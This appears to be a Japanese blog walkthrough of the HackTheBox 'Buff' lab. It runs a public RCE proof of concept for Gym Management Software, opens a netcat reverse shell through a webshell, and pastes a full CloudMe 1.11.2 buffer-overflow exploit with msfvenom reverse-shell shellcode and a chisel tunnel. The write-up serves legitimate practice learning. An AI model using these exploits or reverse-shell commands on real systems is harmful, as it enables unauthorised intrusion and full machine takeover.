HackTheBox Buff Walkthrough
やっと解けた!ので投稿。userは去年の秋に取れたけどrootは結構難しかった
(ペイロードの編集をしないと取れない...)
HackTheBox BuffのWalkthroughです
目次
ポートスキャン
kali@kali:~$ sudo nmap -A -Pn 10.10.10.198 -p- [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-11 13:22 JST Nmap scan report for 10.10.10.198 Host is up (0.080s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 |_http-title: mrb3n's Bro Hut Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008 (85%) OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 Aggressive OS guesses: Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 8080/tcp) HOP RTT ADDRESS 1 80.20 ms 10.10.14.1 2 80.43 ms 10.10.10.198 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 155.55 seconds
Windows Serverで、ポート8080にWebサーバが立っていることは分かった。さて、どうしたものか。
OpenSSL, PHPのバージョンで脆弱性を調べたが、いい感じのものがない。
Webサーバの調査
gobuster
でWebサーバのディレクトリ列挙も試してみる。
kali@kali:~$ gobuster dir -u http://10.10.10.198:8080/ -w /usr/share/dirb/wordlists/common.txt -s '200,204,301,302,307,403,500' -e =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.198:8080/ [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/common.txt [+] Status codes: 200,204,301,302,307,403,500 [+] User Agent: gobuster/3.0.1 [+] Expanded: true [+] Timeout: 10s =============================================================== 2020/10/11 14:52:31 Starting gobuster =============================================================== http://10.10.10.198:8080/.hta (Status: 403) http://10.10.10.198:8080/.htaccess (Status: 403) http://10.10.10.198:8080/.htpasswd (Status: 403) http://10.10.10.198:8080/admin.cgi (Status: 403) http://10.10.10.198:8080/admin.pl (Status: 403) http://10.10.10.198:8080/AT-admin.cgi (Status: 403) http://10.10.10.198:8080/aux (Status: 403) http://10.10.10.198:8080/boot (Status: 301) http://10.10.10.198:8080/cachemgr.cgi (Status: 403) http://10.10.10.198:8080/cgi-bin/ (Status: 403) http://10.10.10.198:8080/com1 (Status: 403) http://10.10.10.198:8080/com2 (Status: 403) http://10.10.10.198:8080/com3 (Status: 403) http://10.10.10.198:8080/con (Status: 403) http://10.10.10.198:8080/ex (Status: 301) http://10.10.10.198:8080/img (Status: 301) http://10.10.10.198:8080/include (Status: 301) http://10.10.10.198:8080/index.php (Status: 200) http://10.10.10.198:8080/license (Status: 200) http://10.10.10.198:8080/LICENSE (Status: 200) http://10.10.10.198:8080/licenses (Status: 403) http://10.10.10.198:8080/lpt2 (Status: 403) http://10.10.10.198:8080/lpt1 (Status: 403) http://10.10.10.198:8080/nul (Status: 403) http://10.10.10.198:8080/phpmyadmin (Status: 403) http://10.10.10.198:8080/prn (Status: 403) http://10.10.10.198:8080/profile (Status: 301) http://10.10.10.198:8080/server-info (Status: 403) http://10.10.10.198:8080/server-status (Status: 403) http://10.10.10.198:8080/upload (Status: 301) http://10.10.10.198:8080/webalizer (Status: 403) =============================================================== 2020/10/11 14:53:24 Finished ===============================================================
これらの情報を元に、ブラウザでアクセスしてみる
筋肉体操みたいなページが出てきた。スポーツジムのサイトっぽい。
いくつか漁っていると、
contact.php
を見ると、Gym Management Software 1.0
と書いてある。
こんなソフトウェアあるのか...?
ダメ元でGoogle検索してみたところ、Exploit DBでPoCが引っかかった。
PoCを読んでいくと、RCEの脆弱性があることが分かる。
実行には、Python2系の requests
, colorama
モジュールが必要なため、入れておく。
kali@kali:~/Downloads$ curl -kL https://bootstrap.pypa.io/get-pip.py | python2 kali@kali:~/Downloads$ python2 -m pip install colorama requests
PoCを実行してみると、見事に刺さった。webshellを使って、shaunユーザでログインしたらしい。
kali@kali:~/Downloads$ python 48506.py http://10.10.10.198:8080/ /\ /vvvvvvvvvvvv \--------------------------------------, `^^^^^^^^^^^^ /============BOKU=====================" \/ [+] Successfully connected to webshell. C:\xampp\htdocs\gym\upload> �PNG C:\xampp\htdocs\gym\upload> whoami �PNG ▒ buff\shaun
これを使って、nc.exeを転送したい。
今回のターゲットマシンはWindowsなので、Windows用のnc.exeを送る。
KaliのWindows用バイナリは、/usr/share/windows-binaries/
にあるので、
必ずそこからデスクトップ等にコピーしたものを転送する。
転送については、転送したいファイルを置いたパスでpythonでSimpleHTTPServerを立ててから、
転送先マシンにてcurl -o
を実行して、取りに行く方式で行った。
kali@kali:~$ cp /usr/share/windows-binaries/nc.exe nc.exe kali@kali:~$ ls Desktop Downloads nc.exe Public saturnglave_NFL.ovpn Templates Documents Music Pictures saturnglave_HTB.ovpn saturnglave_tryhackme.ovpn Videos kali@kali:~$ python -m SimpleHTTPServer 8000 C:\xampp\htdocs\gym\upload> curl -o nc.exe http://自分のIPアドレス:8000/nc.exe �PNG ▒ C:\xampp\htdocs\gym\upload> dir �PNG ▒ Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\xampp\htdocs\gym\upload 29/11/2020 09:16 <DIR> . 29/11/2020 09:16 <DIR> .. 29/11/2020 09:07 53 kamehameha.php 29/11/2020 09:16 59,392 nc.exe 2 File(s) 59,445 bytes 2 Dir(s) 9,671,041,024 bytes free
配置が完了したら、Kali側で nc -nvlp ポート番号
で待ち受けておく。
その後、ブラウザで以下を開く。
http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc.exe+自分のIPアドレス+1111+-e+cmd.exe
これで、先程のPoCを使って、ncで自分のマシンの1111番ポートにcmd.exeの実行結果を転送させることができる。
kali@kali:~$ sudo nc -nlvp 1111 listening on [any] 1111 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.198] 49683 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\xampp\htdocs\gym\upload>
これでサーバに入ることができた。
フラグを探す
shaunユーザのディレクトリを探すと、
C:\Users\shaun\Desktop
にuser.txtを発見。
C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\Users 16/06/2020 19:52 <DIR> . 16/06/2020 19:52 <DIR> .. 20/07/2020 11:08 <DIR> Administrator 16/06/2020 14:08 <DIR> Public 16/06/2020 14:11 <DIR> shaun 0 File(s) 0 bytes 5 Dir(s) 9,670,443,008 bytes free C:\Users\shaun\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\Users\shaun\Desktop 14/07/2020 12:27 <DIR> . 14/07/2020 12:27 <DIR> .. 23/11/2020 09:32 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 9,670,430,720 bytes free C:\Users\shaun\Desktop>type user.txt type user.txt xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Administratorも見ようとしたが、アクセス拒否された。
権限昇格が必要らしい...
C:\Users>cd Administrator/Desktop cd Administrator/Desktop Access is denied.
権限昇格
ここからが本番だった疑惑。
Administratorの中身が見られないので、shaunユーザのディレクトリをもう少し調べる。
C:\Users\shaun>cd Downloads cd Downloads C:\Users\shaun\Downloads>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\Users\shaun\Downloads 14/07/2020 12:27 <DIR> . 14/07/2020 12:27 <DIR> .. 16/06/2020 15:26 17,830,824 CloudMe_1112.exe 1 File(s) 17,830,824 bytes 2 Dir(s) 9,621,082,112 bytes free
CloudMe_1112.exe
という怪しいファイルが見つかる。
これも検索すると、BoFの脆弱性を使うExploitが見つかった。
Exploitを使えるようにする
ただし、よく見ると管理者権限でcalc.exe(電卓)を起動しているだけだった。
これを改造しないといけない。
具体的には、msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
の
ペイロードを、今回の用途に差し替える必要がある。
ペイロードを作る時は、msfvenom
を使った。以下を参考に作成する。
今回は、Windowsのリバースシェルが必要なので、この様式を使う。
msfvenom -p windows/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f python
-p
でペイロードの中身、-f
でフォーマットを指定。-v
で出力フォーマットに入る値を指定できる。
何も指定しないと、buf
になる。今回のPoCはpayload
という変数を使うのでそれを指定した。
kali@kali:~/Downloads$ msfvenom -p windows/shell_reverse_tcp LHOST=自分のIPアドレス LPORT=4444 -b "\x00\x0a\x0d" -f python -v payload [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of python file: 1869 bytes payload = b"" payload += b"\xd9\xd0\xd9\x74\x24\xf4\x5a\x2b\xc9\xbb\xa4\x88" payload += b"\xaf\x10\xb1\x52\x83\xea\xfc\x31\x5a\x13\x03\xfe" payload += b"\x9b\x4d\xe5\x02\x73\x13\x06\xfa\x84\x74\x8e\x1f" payload += b"\xb5\xb4\xf4\x54\xe6\x04\x7e\x38\x0b\xee\xd2\xa8" payload += b"\x98\x82\xfa\xdf\x29\x28\xdd\xee\xaa\x01\x1d\x71" payload += b"\x29\x58\x72\x51\x10\x93\x87\x90\x55\xce\x6a\xc0" payload += b"\x0e\x84\xd9\xf4\x3b\xd0\xe1\x7f\x77\xf4\x61\x9c" payload += b"\xc0\xf7\x40\x33\x5a\xae\x42\xb2\x8f\xda\xca\xac" payload += b"\xcc\xe7\x85\x47\x26\x93\x17\x81\x76\x5c\xbb\xec" payload += b"\xb6\xaf\xc5\x29\x70\x50\xb0\x43\x82\xed\xc3\x90" payload += b"\xf8\x29\x41\x02\x5a\xb9\xf1\xee\x5a\x6e\x67\x65" payload += b"\x50\xdb\xe3\x21\x75\xda\x20\x5a\x81\x57\xc7\x8c" payload += b"\x03\x23\xec\x08\x4f\xf7\x8d\x09\x35\x56\xb1\x49" payload += b"\x96\x07\x17\x02\x3b\x53\x2a\x49\x54\x90\x07\x71" payload += b"\xa4\xbe\x10\x02\x96\x61\x8b\x8c\x9a\xea\x15\x4b" payload += b"\xdc\xc0\xe2\xc3\x23\xeb\x12\xca\xe7\xbf\x42\x64" payload += b"\xc1\xbf\x08\x74\xee\x15\x9e\x24\x40\xc6\x5f\x94" payload += b"\x20\xb6\x37\xfe\xae\xe9\x28\x01\x65\x82\xc3\xf8" payload += b"\xee\xa7\x19\x0c\xed\xdf\x1f\x10\xe0\x43\xa9\xf6" payload += b"\x68\x6c\xff\xa1\x04\x15\x5a\x39\xb4\xda\x70\x44" payload += b"\xf6\x51\x77\xb9\xb9\x91\xf2\xa9\x2e\x52\x49\x93" payload += b"\xf9\x6d\x67\xbb\x66\xff\xec\x3b\xe0\x1c\xbb\x6c" payload += b"\xa5\xd3\xb2\xf8\x5b\x4d\x6d\x1e\xa6\x0b\x56\x9a" payload += b"\x7d\xe8\x59\x23\xf3\x54\x7e\x33\xcd\x55\x3a\x67" payload += b"\x81\x03\x94\xd1\x67\xfa\x56\x8b\x31\x51\x31\x5b" payload += b"\xc7\x99\x82\x1d\xc8\xf7\x74\xc1\x79\xae\xc0\xfe" payload += b"\xb6\x26\xc5\x87\xaa\xd6\x2a\x52\x6f\xe6\x60\xfe" payload += b"\xc6\x6f\x2d\x6b\x5b\xf2\xce\x46\x98\x0b\x4d\x62" payload += b"\x61\xe8\x4d\x07\x64\xb4\xc9\xf4\x14\xa5\xbf\xfa" payload += b"\x8b\xc6\x95"
できたペイロードを、エディタで元のPoCのPayload部分と差し替える。
また、sys
モジュールがないと動かないので、import sys
も追記。
使ったPoCはこの通りになった。
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) # Date: 2020-04-27 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 10 x86 #Instructions: # Start the CloudMe service and run the script. import socket import sys target = "127.0.0.1" padding1 = b"\x90" * 1052 EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET NOPS = b"\x90" * 30 # msfvenom -p windows/shell_reverse_tcp LHOST=自分のIPアドレス LPORT=4444 -b "\x00\x0a\x0d" -f python -v payload payload = b"" payload += b"\xd9\xd0\xd9\x74\x24\xf4\x5a\x2b\xc9\xbb\xa4\x88" payload += b"\xaf\x10\xb1\x52\x83\xea\xfc\x31\x5a\x13\x03\xfe" payload += b"\x9b\x4d\xe5\x02\x73\x13\x06\xfa\x84\x74\x8e\x1f" payload += b"\xb5\xb4\xf4\x54\xe6\x04\x7e\x38\x0b\xee\xd2\xa8" payload += b"\x98\x82\xfa\xdf\x29\x28\xdd\xee\xaa\x01\x1d\x71" payload += b"\x29\x58\x72\x51\x10\x93\x87\x90\x55\xce\x6a\xc0" payload += b"\x0e\x84\xd9\xf4\x3b\xd0\xe1\x7f\x77\xf4\x61\x9c" payload += b"\xc0\xf7\x40\x33\x5a\xae\x42\xb2\x8f\xda\xca\xac" payload += b"\xcc\xe7\x85\x47\x26\x93\x17\x81\x76\x5c\xbb\xec" payload += b"\xb6\xaf\xc5\x29\x70\x50\xb0\x43\x82\xed\xc3\x90" payload += b"\xf8\x29\x41\x02\x5a\xb9\xf1\xee\x5a\x6e\x67\x65" payload += b"\x50\xdb\xe3\x21\x75\xda\x20\x5a\x81\x57\xc7\x8c" payload += b"\x03\x23\xec\x08\x4f\xf7\x8d\x09\x35\x56\xb1\x49" payload += b"\x96\x07\x17\x02\x3b\x53\x2a\x49\x54\x90\x07\x71" payload += b"\xa4\xbe\x10\x02\x96\x61\x8b\x8c\x9a\xea\x15\x4b" payload += b"\xdc\xc0\xe2\xc3\x23\xeb\x12\xca\xe7\xbf\x42\x64" payload += b"\xc1\xbf\x08\x74\xee\x15\x9e\x24\x40\xc6\x5f\x94" payload += b"\x20\xb6\x37\xfe\xae\xe9\x28\x01\x65\x82\xc3\xf8" payload += b"\xee\xa7\x19\x0c\xed\xdf\x1f\x10\xe0\x43\xa9\xf6" payload += b"\x68\x6c\xff\xa1\x04\x15\x5a\x39\xb4\xda\x70\x44" payload += b"\xf6\x51\x77\xb9\xb9\x91\xf2\xa9\x2e\x52\x49\x93" payload += b"\xf9\x6d\x67\xbb\x66\xff\xec\x3b\xe0\x1c\xbb\x6c" payload += b"\xa5\xd3\xb2\xf8\x5b\x4d\x6d\x1e\xa6\x0b\x56\x9a" payload += b"\x7d\xe8\x59\x23\xf3\x54\x7e\x33\xcd\x55\x3a\x67" payload += b"\x81\x03\x94\xd1\x67\xfa\x56\x8b\x31\x51\x31\x5b" payload += b"\xc7\x99\x82\x1d\xc8\xf7\x74\xc1\x79\xae\xc0\xfe" payload += b"\xb6\x26\xc5\x87\xaa\xd6\x2a\x52\x6f\xe6\x60\xfe" payload += b"\xc6\x6f\x2d\x6b\x5b\xf2\xce\x46\x98\x0b\x4d\x62" payload += b"\x61\xe8\x4d\x07\x64\xb4\xc9\xf4\x14\xa5\xbf\xfa" payload += b"\x8b\xc6\x95" overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload)) buf = padding1 + EIP + NOPS + payload + overrun try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,8888)) s.send(buf) except Exception as e: print(sys.exc_value)
トンネリング
ここまででやっと実行できるわけではない。
このPoC,なんとトンネルが無いと動かない。
今回は、Chisel
を使ってトンネルを作ってみる。
Chiselのインストールをする。root権限が必要なので注意。
kali@kali:~$ sudo su - root@kali:~# curl https://i.jpillora.com/chisel! | bash % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 3805 0 3805 0 0 12434 0 --:--:-- --:--:-- --:--:-- 12434 Installing jpillora/chisel v1.7.3..... ######################################################################## 100.0%#=#=# ######################################################################## 100.0% Installed at /usr/local/bin/chisel
使えるポートを探してみると、8888も使えることが分かる。
C:\xampp\htdocs\gym\upload>netstat -an netstat -an TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING
Kali側でchisel serverを9999番ポートで立てる。
root@kali:/usr/local/bin# ./chisel server -p 9999 -reverse 2021/01/04 15:01:08 server: Reverse tunnelling enabled 2021/01/04 15:01:08 server: Fingerprint VrfADdcD3cYXWWgrBoK6JoSc8+ov901QSpA8tTHG1kA= 2021/01/04 15:01:08 server: Listening on http://0.0.0.0:9999
別途、chiselのWindows用のバイナリをダウンロードしておき、 これを先程ncを転送する方法と同様に、ターゲット側へ転送する。
C:\xampp\htdocs\gym\upload> curl -o chisel.exe http://自分のIPアドレス:8000/chisel.exe �PNG ▒ C:\xampp\htdocs\gym\upload> dir �PNG ▒ Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\xampp\htdocs\gym\upload 04/01/2021 09:07 <DIR> . 04/01/2021 09:07 <DIR> .. 04/01/2021 09:07 8,818,688 chisel.exe 04/01/2021 09:04 53 kamehameha.php 04/01/2021 09:04 59,392 nc.exe 3 File(s) 8,878,133 bytes 2 Dir(s) 7,122,980,864 bytes free
webshellが刺さったままのターゲット側で、chisel clientを起動する
C:\xampp\htdocs\gym\upload>chisel.exe client 自分のIPアドレス:9999 R:8888:127.0.0.1:8888 chisel.exe client 自分のIPアドレス:9999 R:8888:127.0.0.1:8888 2021/01/04 06:06:14 client: Connecting to ws://自分のIPアドレス:9999 2021/01/04 06:06:14 client: Connected (Latency 79.368ms)
うまく行っていれば、server側でこのような画面が出るはず
root@kali:/usr/local/bin# ./chisel server -p 9999 -reverse -v 2021/01/04 18:23:08 server: Reverse tunnelling enabled 2021/01/04 18:23:08 server: Fingerprint kDjIX6TAvAX5oy8KcxY+whh4Ee1XeZGj2HZR7AlzRf4= 2021/01/04 18:23:08 server: Listening on http://0.0.0.0:9999 2021/01/04 18:23:30 server: session#1: Handshaking... 2021/01/04 18:23:30 server: session#1: Verifying configuration 2021/01/04 18:23:30 server: session#1: tun: Created 2021/01/04 18:23:30 server: session#1: tun: SSH connected 2021/01/04 18:23:30 server: session#1: tun: proxy#R:8888=>8888: Listening 2021/01/04 18:23:30 server: session#1: tun: Bound proxies 2021/01/04 18:24:26 server: session#1: tun: proxy#R:8888=>8888: conn#1: Open 2021/01/04 18:24:26 server: session#1: tun: proxy#R:8888=>8888: conn#1: Close (sent 1.5KB received 0B)
rootフラグを探す
ペイロードを作成した時に指定したポート4444番で、Kali側で待ち受ける。
その後、別のターミナルでKaliにて、python 48389.py
とPoCを実行すると、無事刺さった。
Administratorでログインできているので、これをもとに探索すると、やっとフラグが見つかる。
kali@kali:~$ sudo nc -vlnp 4444 [sudo] password for kali: Sorry, try again. [sudo] password for kali: listening on [any] 4444 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.198] 49681 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami buff\administrator C:\Windows\system32>cd ../../ cd ../../ C:\>cd Users cd Users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\Users 16/06/2020 19:52 <DIR> . 16/06/2020 19:52 <DIR> .. 20/07/2020 11:08 <DIR> Administrator 16/06/2020 14:08 <DIR> Public 16/06/2020 14:11 <DIR> shaun 0 File(s) 0 bytes 5 Dir(s) 7,120,412,672 bytes free C:\Users>cd Administrator cd Administrator C:\Users\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\Users\Administrator 20/07/2020 11:08 <DIR> . 20/07/2020 11:08 <DIR> .. 18/07/2020 16:36 <DIR> 3D Objects 16/06/2020 15:48 <DIR> CloudMe 18/07/2020 16:36 <DIR> Contacts 18/07/2020 16:36 <DIR> Desktop 18/07/2020 16:36 <DIR> Documents 18/07/2020 16:36 <DIR> Downloads 18/07/2020 16:36 <DIR> Favorites 18/07/2020 16:36 <DIR> Links 18/07/2020 16:36 <DIR> Music 16/06/2020 15:44 <DIR> OneDrive 18/07/2020 16:36 <DIR> Pictures 18/07/2020 16:36 <DIR> Saved Games 18/07/2020 16:36 <DIR> Searches 18/07/2020 16:36 <DIR> Videos 0 File(s) 0 bytes 16 Dir(s) 7,120,412,672 bytes free C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\Users\Administrator\Desktop 18/07/2020 16:36 <DIR> . 18/07/2020 16:36 <DIR> .. 16/06/2020 15:41 1,417 Microsoft Edge.lnk 04/01/2021 09:18 34 root.txt 2 File(s) 1,451 bytes 2 Dir(s) 7,120,408,576 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx